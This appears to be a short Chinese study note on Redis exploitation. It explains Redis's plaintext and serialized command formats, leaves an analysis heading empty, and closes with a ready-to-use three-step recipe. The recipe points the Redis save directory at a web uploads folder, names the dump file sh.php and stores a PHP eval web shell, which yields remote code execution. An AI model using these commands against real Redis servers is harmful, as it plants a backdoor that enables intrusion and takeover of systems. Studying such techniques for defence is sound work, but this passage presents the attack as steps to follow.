学习redis主从漏洞你一定要知道的知识点
(1)redis遵循的两种脚本协议
【1】明文(plaintext)
example: SET keyname value\n
【2】序列化(custom)
example: *3\r\n$3\r\nSET\r\n$7\r\nkeyname\r\n$5\r\nval
ue\r\n
【3】分析
(2)实现rce的方法
想实现RCE? 你只要执行下面几步就行
1.CONFIG SET dir /var/www/uploads/
2.CONFIG SET dbfilename sh.php
3.SET PAYLOAD ‘<?php eval($_GET[0]);?>’